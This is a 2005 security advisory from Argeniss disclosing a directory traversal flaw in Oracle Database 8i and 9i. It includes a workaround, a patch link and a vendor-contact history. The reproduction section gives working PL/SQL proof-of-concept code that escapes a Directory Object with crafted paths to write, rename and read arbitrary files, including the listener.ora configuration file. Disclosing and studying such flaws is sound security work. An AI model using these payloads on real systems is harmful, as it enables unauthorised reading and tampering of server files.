Argeniss Security Advisory


Name: Oracle Database Server Directory transversal
Affected Software: Oracle Database Server versions 8i
and 9i
Severity :  Medium
Remote exploitable: Yes (Authentication to Database
Server is needed)
Credits:    Cesar Cerrudo
Date:    03/07/05
Advisory Number:   ARG030501


Details:

Oracle Database Server provides many packages
functions to access the OS file system, some of these
functions are not able to access files directly, for
example in order to access files a Directory Object 
must be created and grant to users permissions on the
object, this object references a directory in the 
file system and it can be used by functions to access
files under that directory only. However functions 
don't properly validate the input and by supplying a
especially constructed string the directory can be 
escaped and the parent directories can be accessed,
because of this any file in the same drive
as the directory, can be read, renamed, overwrited,
etc.


To reproduce the vulnerability execute the next
PL/SQL:
(In older Oracle database server versions the same
could work just using "\..\..\")
(This is not a extensive list of vulnerable functions,
other functions that parse files could
also be vulnerable)

--this create a file called Unbreakable.txt in the
same drive as the directory referenced by 
--MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

--this example can be used to read arbitrary files in
the same drive as the directory referenced by 
--MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
  UTL_FILE.GET_LINE (f,sBuffer);
  DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--this rename any file in the same drive as the
directory referenced by 
--MEDIA_DIR directory object
begin

UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;


By default UTL_FILE package has execute permission to
public role so any Oracle database 
user with permissions on a Directory Object can
exploit this vulnerability.
Explotation of this vulnerability allow an attacker to
overwrite, read, rename, etc. 
arbitrary files.


Vendor Status:

Oracle was contacted on October 2003, after an initial
email interchange i didn't have any
news about when the vulnerability was going to be
patched or when it was patched nor i was credited, 
but this is common when dealing with Oracle on
security issues.


Workaround:

Restrict access to Directory Objects and UTL_FILE
package.



Patch Available: 

http://metalink.oracle.com


Links:

http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.petefinnigan.com/directory_traversal.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf



Important!!!!!!!!

There are still hundreds of unpatched Oracle Database
Server vulnerabilities affecting 
versions 8i, 9i and 10g some of them have been
reported more than 1 year ago.
If you want to know more about these vulnerabilities
and many others check out our 
AVI (Advanced Vulnerability Information) service at
http://www.argeniss.com/services.html




-----------------------------------
--Argeniss - Information Security--
-----http://www.argeniss.com-------
------info>at<argeniss.com---------
-----------------------------------




  
    
__________________________________ 
Celebrate Yahoo!'s 10th Birthday! 
Yahoo! Netrospective: 100 Moments of the Web 
http://birthday.yahoo.com/netrospective/